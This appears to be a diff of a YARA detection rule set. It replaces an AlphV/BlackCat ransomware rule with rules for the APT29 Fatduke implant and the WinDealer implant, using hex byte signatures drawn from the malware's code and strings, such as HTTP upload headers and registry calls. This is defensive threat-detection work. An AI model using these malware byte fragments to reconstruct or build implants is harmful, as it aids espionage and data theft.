-		$s3 = { 45 33 c0 48 2b d0 48 8d 4d c7 e8 ba cf ff ff 0f 10 45 c7 0f 11 45 07 0f 10 4d d7 0f 11 4d 17 4c 89 6d d7 48 c7 45 df 07 00 00 00 66 44 89 6d c7 41 b0 01 48 8d 55 07 e8 bd 0b 00 00 90 48 8b 55 1f 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4d 07 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 f9 09 00 00 e8 34 b6 01 00 90 ba 08 01 00 00 e8 d1 39 ff ff 4c 8b c0 48 c7 45 d7 04 01 00 00 48 c7 45 df 07 01 00 00 41 0f b7 c5 49 8b f8 b9 04 01 00 00 66 f3 ab 66 45 89 a8 08 02 00 00 4c 89 45 c7 48 8d 55 c7 48 83 7d df 08 49 0f 43 d0 44 8b 45 d7 48 8d 0d 83 c7 04 00 ff 15 7d f8 03 00 8b d0 48 8b 45 d7 48 3b d0 77 19 48 8d 45 c7 48 83 7d df 08 48 0f 43 45 c7 48 89 55 d7 66 44 89 2c }
-		$s4 = { 48 8b c3 48 8b 4d b7 48 2b c1 48 83 f8 15 0f 82 7b 04 00 00 4c 8d 4d a7 48 83 7d bf 08 4c 0f 43 4d a7 48 c7 44 24 30 15 00 00 00 48 8d 05 69 c2 04 00 48 89 44 24 28 48 89 4c 24 20 48 8d 4d 07 e8 86 17 00 00 90 45 33 c0 48 8d 55 07 e8 89 05 00 00 90 4c 8b 45 1f 49 83 f8 08 72 0c 49 ff c0 48 8b 55 }
+		$s1 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 00 00 00 00 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 25 73 }
+		$s2 = { 70 72 6f 63 3a 20 20 25 64 20 25 73 0a 6c 6f 67 69 6e 3a 20 25 73 5c 25 73 0a 49 44 3a 20 20 20 20 30 78 25 30 38 58 0a 68 6f 73 74 3a 20 20 25 73 3a 25 64 0a 6d 65 74 68 3a 20 20 25 73 20 25 64 0a 70 69 70 65 3a 20 5c 5c 25 73 5c 70 69 70 65 5c 25 73 0a 6c 61 6e 67 3a 20 20 25 73 0a 64 65 6c 61 79 3a 20 25 64 }
+		$s3 = { 75 70 74 69 6d 65 20 25 35 64 2e 25 30 32 64 68 0a 00 25 73 3a 25 64 00 25 73 5c 25 73 00 3f 00 25 64 20 25 73 0a 25 73 20 25 73 20 25 73 }
+		$s4 = { 55 89 e5 83 ec 14 6a 02 ff 15 b8 53 44 00 e8 fd fe ff ff 8d b6 00 00 00 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 14 6a 01 ff 15 }
+		$s5 = { 8b 85 54 64 ff ff 8b 95 44 64 ff ff 83 c2 44 89 44 24 04 89 14 24 e8 a4 e5 fc ff 83 ec 08 8b 85 44 64 ff ff 83 c0 38 c7 44 24 08 0c 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 e8 8c e8 fd ff 8b 85 44 64 ff ff c7 40 38 0c 00 00 00 8b 85 44 64 ff ff c7 40 40 01 00 00 00 8b 85 44 64 ff ff c7 40 3c 00 00 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 1c 8b 85 44 64 ff ff 83 c0 18 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 2e e5 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 0f 84 09 05 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 24 8b 85 44 64 ff ff 83 c0 20 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 eb e4 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 150KB and 3 of them
 }
-rule ARKBIRD_SOLG_RAN_ALPHV_Dec_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_APT29_Fatduke_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect AlphV ransomware (Nov and Dec 2021)"
+		description = "Detect Fatduke implant used by APT29 group"
 		author = "Arkbird_SOLG"
-		id = "5c758dc9-b1dc-58e0-b443-6f78e27ffefe"
-		date = "2021-12-09"
-		modified = "2021-12-18"
+		id = "aed6d6f0-1baf-5842-8ced-e07f213ef1ff"
+		date = "2021-03-08"
+		modified = "2021-03-10"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-09/RAN_ALPHV_Dec_2021_1.yara#L1-L21"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_Fatduke_Mar_2021_1.yar#L1-L25"
 		license_url = "N/A"
-		logic_hash = "416ebea98f660dd9fad27c3be0c79e47bc69e08fe4be7db76a71462d2c5ada49"
+		logic_hash = "2aec00355b14ec81f577527d3eba1f682ce96cc9e6ac7727b3865ddf01ddf69a"
+		score = 50
+		quality = 67
+		tags = "FILE"
+		hash1 = "0be57d1244fefc679feb7aa9996e539481be7b8f4c9246817f81caa8c2f61a57"
+		level = "Experimental"
+
+	strings:
+		$seq1 = { 5b 8d 8d 5c ff ff ff c7 85 5c ff ff ff 48 74 74 70 51 8d 85 6c ff ff ff c7 85 60 ff ff ff 4f 70 65 6e 50 51 8d 8d 14 fc ff ff c7 85 64 ff ff ff 52 65 71 75 c7 85 68 ff ff ff 65 73 74 57 e8 ce 7b f2 ff c6 45 fc 33 83 78 14 10 72 02 8b 00 50 8d 8d 90 fc ff ff e8 16 7b f2 ff c6 45 fc 34 8d 85 90 fc ff ff 50 8d 85 80 fb ff ff 8b cb 50 e8 bd 74 00 00 8b f0 c6 45 fc 35 8d 87 d0 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 d0 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 c3 2e f6 ff c6 45 fc 34 8d 8d 80 fb ff ff e8 a4 7e f2 ff c6 45 fc 33 83 bd a4 fc ff ff 10 72 0e ff b5 90 fc ff ff e8 71 0d 17 00 83 c4 04 c7 85 a4 fc ff ff 0f 00 00 00 c7 85 a0 fc ff ff 00 00 00 00 c6 85 90 fc ff ff 00 c6 45 fc 1b 83 bd 28 fc ff ff 10 72 0e ff b5 14 fc ff ff e8 3b 0d 17 00 83 c4 04 c7 85 28 fc ff ff 0f 00 00 00 c7 85 24 fc ff ff 00 00 00 00 c6 85 14 fc ff ff 00 57 bf 0b 3b 0e 02 31 cf 21 d7 21 ff bf 2b 34 81 13 21 c7 09 cf 5f 56 be 22 0c d2 00 be 80 41 78 6d 31 e6 21 ee be 55 13 41 71 90 5e 8d 8d 1c ff ff ff c7 85 1c ff ff ff 48 74 74 70 51 8d 85 32 ff ff ff c7 85 20 ff ff ff 41 64 64 52 50 51 8d 8d 2c fc ff ff c7 85 24 ff ff ff 65 71 75 65 c7 85 28 ff ff ff 73 74 48 65 c7 85 2c ff ff ff 61 64 65 72 66 c7 85 30 ff ff ff 73 57 e8 67 7a f2 ff c6 45 fc 36 83 78 14 10 72 02 8b 00 50 8d 8d 38 fd ff ff e8 af 79 f2 ff c6 45 fc 37 8d 85 38 fd ff ff 50 8d 85 c8 fb ff ff 8b cb 50 e8 36 b1 ff ff 8b f0 c6 45 fc 38 8d 87 e8 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 e8 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 5c 2d f6 ff c6 45 fc 37 8d 8d c8 fb ff ff e8 3d 7d f2 ff c6 45 fc 36 83 bd 4c fd ff ff 10 72 0e ff b5 38 fd ff ff e8 0a 0c 17 00 83 c4 04 c7 85 4c fd ff ff 0f 00 00 00 c7 85 48 fd ff ff 00 00 00 00 c6 85 38 fd ff ff 00 c6 45 fc 1b 83 bd 40 fc ff ff 10 72 0e ff b5 2c fc ff ff e8 d4 0b 17 00 83 c4 04 c7 85 40 fc ff ff 0f 00 00 00 c7 85 3c fc ff ff 00 00 00 00 c6 85 2c fc ff ff 00 50 b8 dc 4d a8 4d b8 4f 50 97 15 b8 97 55 f0 68 01 c0 01 e8 90 58 50 b8 e6 6f 71 3c 21 e0 21 e8 21 f0 21 c0 31 f0 b8 fa 02 db 55 58 8d 8d 7c ff ff ff c7 85 7c ff ff ff 48 74 74 70 51 8d 45 8c c7 45 80 53 65 6e 64 50 51 8d 8d 60 fc ff ff c7 45 84 52 65 71 75 c7 45 88 65 73 74 57 e8 1f 79 f2 ff c6 45 fc 39 83 78 14 10 72 02 8b 00 50 8d 8d 08 fd ff ff e8 67 78 f2 ff c6 45 fc 3a 8d 85 08 fd ff ff 50 8d 85 f8 fb ff ff 8b cb 50 e8 4e 75 00 00 8b f0 c6 45 fc 3b 8d 87 00 01 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 00 01 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 14 2c f6 ff c6 45 fc 3a 8d 8d f8 fb ff ff e8 f5 7b f2 ff c6 45 fc 39 83 bd 1c fd ff ff 10 72 0e ff b5 08 fd ff ff e8 c2 0a 17 00 83 c4 04 c7 85 1c fd ff ff 0f 00 00 00 c7 85 18 fd ff ff 00 00 00 00 c6 85 08 fd ff ff 00 c6 45 fc 1b 83 bd 74 fc ff ff 10 72 0e ff b5 60 fc ff ff e8 8c 0a 17 00 83 c4 04 c7 85 74 fc ff ff 0f 00 00 00 c7 85 70 fc ff ff 00 00 00 00 c6 85 60 fc ff ff 00 50 01 c8 21 f8 b8 f5 2f 8f 4d 01 e8 09 d0 01 c0 b8 4e 35 2f 2a 58 52 ba 6d 65 6b 13 01 fa 09 da 31 c2 09 da ba c9 1d 51 12 31 c2 5a 8d 4d 9c c7 45 9c 48 74 74 70 51 8d 45 aa c7 45 a0 51 75 65 72 50 51 8d 8d 48 fc ff ff c7 45 a4 79 49 6e 66 66 c7 45 a8 6f 57 e8 de 77 f2 ff c6 45 fc 3c 83 78 14 10 72 02 8b 00 50 8d 8d 50 fd ff ff e8 26 77 f2 ff c6 45 fc 3d 8d 85 50 fd ff ff 50 8d 85 98 fb ff ff 8b cb 50 e8 4d 77 00 00 8b f0 c6 45 fc 3e 8d 9f 18 01 00 00 3b de 74 24 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 56 8b cb e8 d9 2a f6 ff c6 45 fc 3d 8d 8d 98 fb ff ff e8 ba 7a f2 ff c6 45 fc 3c 83 bd 64 fd ff ff 10 72 0e ff b5 50 fd ff ff e8 87 09 17 00 83 c4 04 c7 85 64 fd ff ff 0f 00 00 00 c7 85 60 fd ff ff 00 00 00 00 c6 85 50 fd ff ff 00 c6 45 fc 1b 83 bd 5c fc ff ff 10 72 0e ff b5 48 fc ff ff e8 51 09 17 00 83 c4 04 c7 85 5c fc ff ff 0f 00 00 00 c7 85 58 fc ff ff 00 00 00 00 c6 85 48 fc ff ff 00 56 01 d6 19 ee be ed 3e 23 0c 01 fe 21 e6 be db 1f 20 70 31 e6 5e 57 29 c7 bf 8d 30 ff 05 bf 4e 30 f9 71 19 f7 29 f7 31 ff 09 ef 5f 68 b8 b3 2b 10 8d 8d d8 fc ff ff e8 22 76 f2 ff c6 45 fc 3f 8d 8d d8 fc ff ff e8 f3 e5 f3 ff 8b f0 c6 45 fc 1b 83 bd ec fc ff ff 10 72 0e ff b5 d8 fc ff ff e8 ce 08 17 00 83 c4 04 c7 85 ec fc ff ff 0f 00 00 00 c7 85 e8 fc ff ff 00 00 00 00 c6 85 d8 fc ff ff 00 52 ba 13 63 67 6d ba 64 19 d5 47 ba 08 52 da 36 01 ea 29 f2 90 5a 55 bd 53 0d b6 39 bd 54 64 02 7d bd 29 00 37 0f 09 d5 31 c5 90 5d 8d 45 c0 8b ce 50 e8 f4 f0 f4 ff c6 45 fc 40 52 29 c2 ba a5 19 33 0c 19 ea 31 e2 01 c2 ba 3c 66 39 43 29 ca 5a 52 ba f7 42 4e 7a 09 d2 19 c2 19 e2 01 e2 21 ca 01 ca 01 da 90 5a 8d 45 d8 8b ce 50 e8 c9 fa f4 ff c6 45 fc 41 57 01 df 09 d7 bf 16 71 1b 6c bf 80 30 fd 65 01 ff 19 f7 21 ef 5f 50 29 e8 b8 6d 44 90 22 01 e8 21 c8 b8 17 5e 05 78 09 f0 01 e8 58 83 7d d0 00 76 5b 83 7d d4 08 8b 45 c0 73 03 8d 45 c0 83 7d ec 08 8b 4d d8 73 03 8d 4d d8 83 ec 08 50 6a 03 51 8d 4f 40 e8 3c 87 ff ff 89 87 a0 04 00 00 52 31 e2 01 e2 ba b7 14 98 25 01 ca ba 2f 1e d7 1b 19 f2 29 d2 5a 57 bf 75 4c a1 10 bf dc 04 47 09 01 d7 bf 9e 5f 9a 0e 01 e7 90 5f eb 4e 83 7d ec 08 8b 45 d8 73 03 8d 45 d8 83 ec 08 8d 4f 40 6a 00 6a 01 50 e8 ec 86 ff ff 89 87 a0 04 00 00 53 bb ea 4a 79 17 21 eb 31 db bb b9 2c e1 4c 09 d3 21 eb 19 c3 5b 51 b9 91 6c 71 6d b9 64 25 d3 02 19 c1 19 c1 31 e1 29 f1 29 d9 59 83 bf a0 04 00 00 00 0f 85 a6 00 00 00 8d 8d e4 fe ff ff c7 85 e4 fe ff ff 43 61 6e 6e 51 8d 85 00 ff ff ff c7 85 e8 fe ff ff 6f 74 20 70 50 51 8d 8d 68 fb ff ff c7 85 ec fe ff ff 65 72 66 6f c7 85 f0 fe ff ff 72 6d 20 49 c7 85 f4 fe ff ff 6e 74 65 72 c7 85 f8 fe ff ff 6e 65 74 4f c7 85 fc fe ff ff 70 65 6e 21 e8 bd 74 f2 ff c6 45 fc 42 83 78 14 10 }
+		$seq2 = { 59 52 29 d2 ba 02 4d d2 52 ba 5f 54 50 4f 29 ea 29 c2 01 ea 01 e2 5a 56 21 ee 01 ee be 38 36 21 60 31 f6 19 ce 29 d6 be 13 6c 2d 6f 5e 85 c0 0f 85 0a 02 00 00 8d 8d 1c fe ff ff c7 85 1c fe ff ff 43 61 6e 6e 51 8d 85 5e fe ff ff c7 85 20 fe ff ff 6f 74 20 69 50 51 8d 8d c4 f7 ff ff c7 85 24 fe ff ff 6e 69 74 69 c7 85 28 fe ff ff 61 6c 69 7a c7 85 2c fe ff ff 65 20 73 69 c7 85 30 fe ff ff 67 6e 65 72 c7 85 34 fe ff ff 21 20 43 61 c7 85 38 fe ff ff 6e 6e 6f 74 c7 85 3c fe ff ff 20 70 65 72 c7 85 40 fe ff ff 66 6f 72 6d c7 85 44 fe ff ff 20 43 72 79 c7 85 48 fe ff ff 70 74 41 63 c7 85 4c fe ff ff 71 75 69 72 c7 85 50 fe ff ff 65 43 6f 6e c7 85 54 fe ff ff 74 65 78 74 c7 85 58 fe ff ff 20 65 72 72 66 c7 85 5c fe ff ff 6f 72 e8 93 5b f1 ff c6 45 fc 46 83 78 14 10 72 02 8b 00 50 8d 8d f0 f9 ff ff e8 db 5a f1 ff c6 45 fc 47 ff d3 50 8d 85 f0 f9 ff ff 50 8d 8d 78 f8 ff ff e8 c2 e3 f8 ff 68 d4 4f 2e 10 8d 85 78 f8 ff ff 50 e8 3c 31 16 00 8d 8d 64 fe ff ff c7 85 64 fe ff ff 43 61 6e 6e 51 8d 85 a6 fe ff ff c7 85 68 fe ff ff 6f 74 20 69 50 51 8d 8d 94 f7 ff ff c7 85 6c fe ff ff 6e 69 74 69 c7 85 70 fe ff ff 61 6c 69 7a c7 85 74 fe ff ff 65 20 73 69 c7 85 78 fe ff ff 67 6e 65 72 c7 85 7c fe ff ff 21 20 43 61 c7 85 80 fe ff ff 6e 6e 6f 74 c7 85 84 fe ff ff 20 70 65 72 c7 85 88 fe ff ff 66 6f 72 6d c7 85 8c fe ff ff 20 43 72 79 c7 85 90 fe ff ff 70 74 41 63 c7 85 94 fe ff ff 71 75 69 72 c7 85 98 fe ff ff 65 43 6f 6e c7 85 9c fe ff ff 74 65 78 74 c7 85 a0 fe ff ff 20 65 72 72 66 c7 85 a4 fe ff ff 6f 72 e8 8e 5a f1 ff c6 45 fc 48 83 78 14 10 72 02 8b 00 }
+		$seq3 = { c7 85 1c f8 ff ff 07 00 00 00 c7 85 18 f8 ff ff 00 00 00 00 33 c0 66 89 85 08 f8 ff ff 53 19 f3 21 db 21 fb 31 f3 29 fb 19 f3 bb 9f 7a e7 00 21 fb 90 5b 52 ba 77 2c 66 51 ba 60 54 5a 36 19 ea 09 ca ba 32 36 94 1b 90 5a 53 09 eb bb 92 73 c4 2a bb d1 71 ed 5e 01 eb bb 9b 43 21 23 90 5b 50 b8 09 65 36 3a 09 c0 29 e8 29 f8 21 f8 b8 3d 39 c6 44 01 e8 58 89 85 78 fd ff ff 89 85 7c fd ff ff 89 85 80 fd ff ff 89 85 84 fd ff ff 89 85 88 fd ff ff 89 85 8c fd ff ff c7 85 88 f8 ff ff 52 65 67 4f c7 85 8c f8 ff ff 70 65 6e 4b c7 85 90 f8 ff ff 65 79 45 78 c6 85 94 f8 ff ff 57 89 85 48 f8 ff ff 89 85 4c f8 ff ff c7 85 4c f8 ff ff 0f 00 00 00 89 85 48 f8 ff ff 88 85 38 f8 ff ff 8d 85 95 f8 ff ff 50 8d 85 88 f8 ff ff 50 8d 85 38 f8 ff ff 50 50 8b c8 e8 99 c1 de ff c6 45 fc 0a 83 bd 4c f8 ff ff 10 8b 85 38 f8 ff ff 73 06 8d 85 38 f8 ff ff 50 8d }
+		$seq4 = { 31 e1 b9 e9 52 83 05 29 d1 01 f9 59 80 7d 0c 00 0f 84 fb 03 00 00 66 c7 85 70 fe ff ff 0d 0a c7 85 50 fe ff ff 0d 0a 2d 2d c7 85 14 fe ff ff 53 75 62 6d c7 85 18 fe ff ff 69 74 74 65 c6 85 1c fe ff ff 64 c7 85 78 fd ff ff 43 6f 6e 74 c7 85 7c fd ff ff 65 6e 74 2d c7 85 80 fd ff ff 44 69 73 70 c7 85 84 fd ff ff 6f 73 69 74 c7 85 88 fd ff ff 69 6f 6e 3a c7 85 8c fd ff ff 20 66 6f 72 c7 85 90 fd ff ff 6d 2d 64 61 c7 85 94 fd ff ff 74 61 3b 20 c7 85 98 fd ff ff 6e 61 6d 65 c7 85 9c fd ff ff 3d 22 65 6e c7 85 a0 fd ff ff 64 22 0d 0a 66 c7 85 a4 fd ff ff 0d 0a 8d 8d 70 fe ff ff 8d 85 72 fe ff ff 51 50 51 8d 8d 3c fa ff ff e8 b3 34 fb ff 8b d8 c6 45 fc 35 8d 8d 50 fe ff ff 8d 85 54 fe ff ff 51 50 51 8d 8d 6c fa ff ff e8 93 34 fb ff 8b f8 c6 45 fc 36 8d 8d 14 fe ff ff 8d 85 1d fe ff ff 51 50 51 8d 8d 84 fa ff ff e8 73 34 fb ff c6 45 fc 37 83 78 14 10 72 02 8b 00 50 8d 8d 1c f8 ff ff e8 bb 33 fb ff 89 85 7c fe ff ff c6 45 fc 38 8d 8d 78 fd ff ff 8d 85 a6 fd ff ff 51 50 51 8d 8d 80 f8 ff ff e8 37 34 fb ff c6 45 fc 39 83 78 14 10 72 02 8b 00 ff b5 7c fe ff ff 8b d0 8d 8d 04 f7 ff ff e8 88 4e fc ff 83 c4 04 c6 45 fc 3a 83 7f 14 10 72 02 8b 3f 57 8b d0 8d 8d 9c f8 ff ff e8 cb 60 fb ff c6 45 fc 3b 8d 4d d4 51 8b d0 8d 8d 74 f7 ff ff e8 96 b9 00 00 83 c4 08 c6 45 fc 3c 83 7b 14 10 72 02 8b 1b 53 8b d0 8d 8d b8 f8 ff ff e8 99 60 fb ff 83 c4 04 c6 45 fc 3d 6a ff 6a 00 50 8d 4d a4 e8 d5 39 fb ff c6 45 fc 3c 83 bd cc f8 ff ff 10 72 0e ff b5 b8 f8 ff ff e8 d2 c5 1f 00 83 c4 04 c7 85 cc f8 ff ff 0f 00 00 00 c7 85 c8 f8 ff ff 00 00 00 00 c6 85 b8 f8 ff ff 00 c6 45 fc 3b 83 bd 88 f7 ff ff 10 72 0e ff b5 74 f7 ff ff e8 9c c5 1f 00 83 c4 04 c7 85 88 f7 ff ff 0f 00 00 00 c7 85 84 f7 ff ff 00 00 00 00 c6 85 74 f7 ff ff 00 c6 45 fc 3a 83 bd b0 f8 ff ff 10 72 0e ff b5 9c f8 ff ff e8 66 c5 1f 00 83 c4 04 c7 85 b0 f8 ff ff 0f 00 00 00 c7 85 ac f8 ff ff 00 00 00 00 c6 85 9c f8 ff ff 00 c6 45 fc 39 83 bd 18 f7 ff ff 10 72 0e ff b5 04 f7 ff ff e8 30 c5 1f 00 83 c4 04 c7 85 18 f7 ff ff 0f 00 00 00 c7 85 14 f7 ff ff 00 00 00 00 c6 85 04 f7 ff ff 00 c6 45 fc 38 83 bd 94 f8 ff ff 10 72 0e ff b5 80 f8 ff ff e8 fa c4 1f 00 83 c4 04 c7 85 94 f8 ff ff 0f 00 00 00 c7 85 90 f8 ff ff 00 00 00 00 c6 85 80 f8 ff ff 00 c6 45 fc 37 83 bd 30 f8 ff ff 10 72 0e ff b5 1c f8 ff ff e8 c4 c4 1f 00 83 c4 04 c7 85 30 f8 ff ff 0f 00 00 00 c7 85 2c f8 ff ff 00 00 00 00 c6 85 1c f8 ff ff 00 c6 45 fc 36 83 bd 98 fa ff ff 10 72 0e ff b5 84 fa ff ff e8 8e c4 1f 00 83 c4 04 c7 85 98 fa ff ff 0f 00 00 00 c7 85 94 fa ff ff 00 00 00 00 c6 85 84 fa ff ff 00 c6 45 fc 35 83 bd 80 fa ff ff 10 72 0e ff b5 6c fa ff ff e8 58 c4 1f 00 83 c4 04 c7 85 80 fa ff ff 0f 00 00 00 c7 85 7c fa ff ff 00 00 00 00 c6 85 6c fa ff ff 00 c6 45 fc 27 83 bd 50 fa ff ff 10 72 0e ff b5 3c fa ff ff e8 22 c4 1f 00 83 c4 04 c7 85 50 fa ff ff 0f 00 00 00 c7 85 4c fa ff ff 00 00 00 00 c6 85 3c fa ff ff 00 53 19 d3 bb 18 4a 91 1c 21 c3 bb 82 54 5d 2c bb b0 08 2a 58 90 5b 51 21 e9 b9 b9 6e b4 14 31 f1 01 c1 01 f9 19 e1 21 d9 09 f9 90 59 56 be cd 3a 33 5a be 85 1b aa 6f be 1e 6c 78 2d 19 d6 21 e6 90 5e 53 31 f3 bb 8c 21 88 0d 31 db 31 eb 19 d3 19 f3 31 f3 01 f3 90 5b 80 7e 40 00 0f 85 03 06 00 00 66 c7 85 60 fe ff ff 0d 0a c7 85 48 fe ff ff 0d 0a 2d 2d c7 85 d8 fc ff ff 43 6f 6e 74 c7 85 dc fc ff ff 65 6e 74 2d c7 85 e0 fc ff ff 44 69 73 70 c7 85 e4 fc ff ff 6f 73 69 74 c7 85 e8 fc ff ff 69 6f 6e 3a c7 85 ec fc ff ff 20 66 6f 72 c7 85 f0 fc ff ff 6d 2d 64 61 c7 85 f4 fc ff ff 74 61 3b 20 c7 85 f8 fc ff ff 6e 61 6d 65 c7 85 fc fc ff ff 3d 22 63 73 c7 85 00 fd ff ff 72 66 5f 74 c7 85 04 fd ff ff 6f 6b 65 6e c7 85 08 fd ff ff 22 0d 0a 0d c6 85 0c fd ff ff 0a 8d 8d 60 fe ff ff 8d 85 62 fe ff ff 51 50 51 8d 8d 00 f9 ff ff e8 b7 30 fb ff 8b d8 c6 45 fc 3e 8d 8d 48 fe ff ff 8d 85 4c fe ff ff 51 50 51 8d 8d 30 f9 ff ff e8 97 30 }
+		$op1 = { 37 25 38 3d 38 43 38 5e 38 6c 38 77 38 }
+		$op2 = { 3f 25 3f 36 3f 66 3f 74 3f }
+		$op3 = { 68 66 43 78 28 6a 25 }
+		$op4 = { 61 46 25 7c 5f 56 21 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 350KB and 2 of ( $seq* ) and 3 of ( $op* )
+}
+rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_2 : FILE
+{
+	meta:
+		description = "Detect modules from WinDealer implant"
+		author = "Arkbird_SOLG"
+		id = "3cca1fa1-2651-5a93-bef1-d32a7b5be4c9"
+		date = "2021-10-30"
+		modified = "2021-10-31"
+		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_2.yara#L1-L19"
+		license_url = "N/A"
+		logic_hash = "c2fb5697dcdb34e0fb3e2dbd2df05748eddc2796c253e90503372eb73c475fab"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83"
-		hash2 = "7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e"
-		hash3 = "cefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae"
-		hash4 = "731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161"
+		hash1 = "0c365d9730a10f1a3680d24214682f79f88aa2a2a602d3d80ef4c1712210ab07"
+		hash2 = "2eef273af0c768b514db6159d7772054d27a6fa8bc3d862df74de75741dbfb9c"
 		tlp = "white"
-		adversary = "BlackCat"
+		adversary = "LuoYu"
 
 	strings:
-		$s1 = { ff b4 24 [2] 00 00 6a 00 ff 35 ?? e1 ?? 00 e8 [3] 00 8d 8c 24 [2] 00 00 ba [3] 00 68 c0 1f 00 00 e8 [3] ff 83 c4 04 ?? bc 24 [2] 00 00 }
-		$s2 = { 85 f6 74 47 8b 3d ?? e1 ?? 00 85 ff 0f 85 81 00 00 00 eb 60 68 [3] 00 6a 00 6a 00 e8 [2] 04 00 85 c0 0f 84 99 01 00 00 89 c1 31 c0 f0 0f b1 0d ?? e1 ?? 00 0f 84 f0 fe ff ff 89 c6 51 e8 [2] 04 00 89 f1 e9 e1 fe ff ff 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 32 03 00 00 89 c6 a3 ?? e1 ?? 00 8b 3d ?? e1 ?? 00 85 ff 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 09 03 00 00 89 c7 a3 ?? e1 ?? 00 89 74 24 18 e8 [2] 04 00 8b 35 ?? e1 ?? 00 89 44 24 14 85 f6 75 1f 68 [3] 00 ff 35 ?? e1 ?? 00 e8 [2] 04 00 85 c0 0f 84 b8 01 00 00 89 c6 a3 ?? e1 ?? 00 8d 44 24 70 c7 44 24 64 00 00 00 00 c7 44 24 60 00 00 00 00 68 0c 01 00 00 6a 00 50 e8 [2] 04 00 83 }
-		$s3 = { 8b 38 89 4d ec 89 55 ?? 74 34 a1 ?? e1 ?? 00 85 c0 75 0e e8 [3] 00 85 c0 74 14 a3 ?? e1 ?? 00 53 6a 00 50 e8 [3] 00 89 c6 85 c0 75 13 89 d9 ba 01 00 00 00 e8 [3] ff 0f 0b be 01 00 00 00 53 57 56 e8 [3] 00 83 c4 0c 8d 04 1e 8d 4d }
-		$s4 = { 83 c4 0c c7 45 ?? 00 00 00 00 c7 45 ?? 02 00 00 89 89 75 ?? 8d 45 ?? c7 45 ?? 00 00 00 00 c7 45 ?? 00 00 00 00 6a 10 50 57 e8 [3] 00 83 f8 ff 0f 84 ?? 02 00 00 f6 45 9c ff }
+		$s1 = { 81 ec f0 03 00 00 53 55 8b d9 56 8d 44 24 0c 57 8d 4c 24 18 50 51 c7 44 24 18 f4 01 00 00 ff 15 0c [2] 10 85 c0 0f 85 ?? 01 00 00 68 [3] 10  }
+		$s2 = { 81 ec 24 03 00 00 53 56 8d 44 24 18 57 50 68 03 01 00 00 6a 00 68 [2] 03 10 68 01 00 00 80 c7 44 24 20 00 00 00 00 ff 15 10 [2] 10 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 20 51 52 8b 1d 00 [2] 10 50 68 3f 01 0f 00 50 50 50 8b 44 24 38 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 10 51 52 50 68 3f 01 0f 00 50 50 50 8b 44 24 3c 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 bf [2] 03 10 83 c9 ff f2 ae f7 d1 2b f9 8d ?? 24 }
+		$s3 = "%s\\%s\\V5_History.dat" wide
